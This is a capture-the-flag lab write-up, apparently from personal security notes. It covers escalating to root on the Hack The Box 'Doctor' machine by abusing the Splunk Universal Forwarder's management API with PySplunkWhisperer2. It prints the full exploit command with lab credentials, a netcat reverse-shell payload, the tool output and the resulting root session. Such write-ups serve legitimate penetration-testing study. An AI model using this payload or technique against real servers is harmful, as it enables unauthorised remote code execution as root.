InfoSec LAB

Doctor_Privilege_Escalation

Created: 2 min read

Abusing Splunk Universal Forwarder (UF)

The Splunk Universal Forwarder Agent (UF) allows authenticated remote users to send single commands or scripts to the agents through the Splunk API. The UF agent doesn’t validate connections coming are coming from a valid Splunk Enterprise server, nor does the UF agent validate the code is signed or otherwise proven to be from the Splunk Enterprise server. This allows an attacker who gains access to the UF agent password to run arbitrary code on the server as SYSTEM or root, depending on the operating system.

exploit (splunkwhisperer2)

This tool is the best tool to exploit misconfigured Splunk Universal Forwarder It supports both Windows and Linux host, I will be using the Python implementation of the exploit

Exploitation

┌──(kali㉿kali)-[~/…/labs/doctor/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host $IP --port 8089 --lhost 10.10.14.9 --username shaun --password Guitar123 --payload 'mkfifo /tmp/stsac; nc 10.10.14.9 1234 0</tmp/stsac | /bin/sh >/tmp/stsac 2>&1; rm /tmp/stsac'
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] created malicious app bundle in: /tmp/tmpf0f_v6__.tar
[+] Started HTTP server for remote mode
[.] installing app from: http://10.10.14.9:8181/
10.10.10.209 - - [09/mar/2023 19:36:34] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
 
Press RETURN to cleanup

Launching the exploit with the payload

┌──(kali㉿kali)-[~/archive/htb/labs/doctor]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.209] 45522
whoami
root
hostname
doctor
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:eb:28 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.209/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:eb28/64 scope global dynamic mngtmpaddr 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:eb28/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks